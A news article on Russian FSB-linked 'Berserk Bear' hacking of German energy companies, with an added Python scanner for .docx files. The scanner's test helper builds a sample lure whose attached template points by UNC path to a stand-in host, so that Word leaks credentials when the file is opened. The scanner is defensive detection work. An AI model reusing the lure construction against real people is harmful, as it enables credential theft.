For years, German authorities have been warning of a hacker group that is specifically spying on the power grid. Investigators managed to identify a suspected perpetrator. The trail leads to the Russian secret service FSB.
It was a wide-ranging espionage operation in which more than 150 companies were to be hacked in Germany alone, especially in the area of so-called critical infrastructure. Specifically, the hackers wanted to scout out the electricity and water supply. According to information obtained by BR and WDR, after years of investigation the State Criminal Police Office of Baden-Württemberg succeeded in identifying one of the suspected perpetrators.
Pawel A. is said to belong to a hacker group that IT security companies call "Berserk Bear" or "Dragonfly". The US Department of Justice assumes that the hackers work for the Russian secret service FSB, more precisely for its "Center 16" department, which is based in Moscow. According to the indictment by the US Department of Justice, the hackers are meant to enable the Russian government to "interrupt and damage important power generation facilities if desired".
Non-public arrest warrant
Pawel A. is held responsible for hacking the network of Netcom BW in the summer of 2017. In September 2021, more than four years later, the Attorney General in Karlsruhe obtained an arrest warrant. To this day it is not public. Netcom BW belongs to the EnBW power group; it handles fiber-optic expansion and also routes important internal EnBW data about the power supply over a specially secured network.
Through a vulnerability in Netcom BW's routers, the hackers gained access to the Internet traffic passing through them, and would have been in a position to manipulate that traffic.
When asked, EnBW stated that the hackers had first compromised an external service provider. "Its infrastructure was compromised as a result." Via a maintenance access, the hackers then gained access to the management system of Netcom BW's public telecommunications network.
“The EnBW electricity and gas network control was never affected, as this is managed in a separate, specially secured network,” says the company. Since the attack, Netcom BW has been regularly checked and certified by independent bodies, and EnBW has “expanded its cyber defense capabilities”. EnBW welcomes the fact that the investigations were successful: “If there should be a conviction, we would of course be very interested in finding out something about the motivation and goals of the attacker.”
E.On also targeted
The research by BR and WDR reporters also draws on previously unknown cases. For example, the hackers were also targeting the electricity company E.On. To do this, they had prepared a 35-page document that appeared to be an internal document from a consulting firm. The document, which is available to BR and WDR, is entitled: "Assessment of the long-term investment needs of the decentralized E.On power grids". As soon as a user opens the document, an attempt is made, without the user noticing, to send their login credentials to a server that the hackers control. The hackers could use these credentials to log into other services that this user uses, for example the e-mail inbox. IT security experts call this spear phishing.
When asked, E.On declined to comment. The consulting firm confirms that there was “an attack on a holding company” in the summer of 2017. The company did not want to answer whether the document originally came from this company.
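The article gives no technical detail on how the lure document sends the credentials. As an added example (not code from the article, from BR/WDR, or from any of the companies named), the following Python scanner assumes one common way such a document is built: an OOXML relationship, such as an attached template, whose target is an external UNC path or URL, so that Word contacts the remote host, and may authenticate to it, as soon as the file is opened. The scanner lists every external relationship in a .docx and flags those of a type Word resolves automatically when the target points at a remote host. The hosts 203.0.113.10 and 198.51.100.7, the file names and the minimal .docx that the script constructs are all made up for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from urllib.parse import urlparse

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL_PREFIX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves on its own when the document is opened, with no
# click by the user. A hyperlink is external too, but is only followed on click,
# so it is deliberately not listed here.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "image", "frame", "subDocument"}


def external_relationships(docx_bytes):
    """Yield (rels_part, short_type, target) for every TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                yield name, short_type, rel.get("Target", "")


def remote_scheme(target):
    """Classify a target: 'unc' for \\\\host\\share paths, the scheme for http/https/file URLs, else None."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):
        return "unc"
    u = urlparse(t)
    if u.scheme in ("http", "https", "file") and u.netloc:
        return u.scheme
    return None


def scan_docx(docx_bytes):
    """Return (rels_part, short_type, target, scheme) for every auto-fetched external reference
    that would make Word contact a remote host when the document is opened."""
    findings = []
    for part, short_type, target in external_relationships(docx_bytes):
        scheme = remote_scheme(target)
        if short_type in AUTO_FETCH_TYPES and scheme:
            findings.append((part, short_type, target, scheme))
    return findings


def build_sample_docx(external_rels):
    """Build a minimal, constructed .docx whose .rels parts carry the given
    (rels_part, short_type, target) entries. Test scaffolding only; the body is empty."""
    by_part = defaultdict(list)
    for part, short_type, target in external_rels:
        by_part[part].append((short_type, target))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                    '<Default Extension="xml" ContentType="application/xml"/></Types>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        for part, rels in by_part.items():
            body = "".join(
                f'<Relationship Id="rId{i + 1}" Type="{DOC_REL_PREFIX}{short_type}" '
                f'Target="{target}" TargetMode="External"/>'
                for i, (short_type, target) in enumerate(rels))
            zf.writestr(part, f'<?xml version="1.0" encoding="UTF-8"?>'
                              f'<Relationships xmlns="{PKG_REL_NS}">{body}</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: an attached template on a UNC path (fetched on open, so flagged)
    # next to an ordinary hyperlink (external, but only followed on click, so not flagged).
    lure = build_sample_docx([
        ("word/_rels/settings.xml.rels", "attachedTemplate", "\\\\203.0.113.10\\templates\\assessment.dotm"),
        ("word/_rels/document.xml.rels", "hyperlink", "https://www.example.com/"),
    ])
    for finding in scan_docx(lure):
        print(finding)
```

The check is deliberately narrow: it looks only at relationship targets, not at macros, embedded objects or field codes, and it does not try to judge whether an external host is legitimate. A UNC target in an attached-template relationship is the one pattern that reliably causes an outbound authentication attempt on open; an http(s) image or template is worth reviewing because it beacons to the remote host. Hyperlinks are listed by `external_relationships` but excluded from the findings so that ordinary documents do not drown the result in noise.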
BND Vice President: network access is procured early
Since the outbreak of the Russian war against Ukraine, German security authorities have been warning of cyber attacks on the power grid. At a conference at the end of June, Wolfgang Wien, Vice President of the Federal Intelligence Service (BND), said: "We must be aware that Russia is in our networks." Such network access, he said, is procured at an early stage. "Let's assume that's prepared," said Wien. Among experts, "Berserk Bear" is considered a group whose task it is to procure such access.
In December 2015, hackers carried out an extensive attack on the power supply in Ukraine. The IT systems of several substations were infected with malware called “Black Energy” and shut down. More than 200,000 people were affected, and the power went out for up to six hours. The group “Sandworm” is held responsible for the attack. According to European security authorities, it is assigned to another Russian secret service, the GRU.
Gabby Roncone works as an IT security expert at Mandiant and has been observing the "Berserk Bear" group for years: "One of our biggest concerns is that the hackers will be able to establish themselves permanently in the compromised networks and later draw on this access when the time has come to use it for destructive attacks." Roncone emphasizes that there is currently no evidence of this. She points out that the hackers are currently primarily spying on office networks and not on industrial plants. That would require completely new tools and in-depth expertise.
Activities monitored by the Office for the Protection of the Constitution
It is unclear how many corporate networks the hackers from "Berserk Bear" were able to penetrate. Only operators of critical infrastructure are required to report such incidents. The Federal Office for the Protection of the Constitution managed to monitor at least part of the hackers' incoming and outgoing Internet traffic, because one of the servers the hackers used was located in Germany.
In addition to phishing attacks, the hackers from "Berserk Bear" also broke into strategically relevant websites and subtly modified them in order to steal confidential information, especially login data. This affected both the website of a company that designs websites for energy suppliers and the website of a company that offers software in this area. The hackers' calculation: many visitors to the websites of these specialized companies are likely to work in the area of critical infrastructure and are therefore interesting targets for espionage. Both companies were apparently unaware that their sites had been compromised. The Attorney General has not commented on the investigation. The Russian embassy left a request for comment unanswered.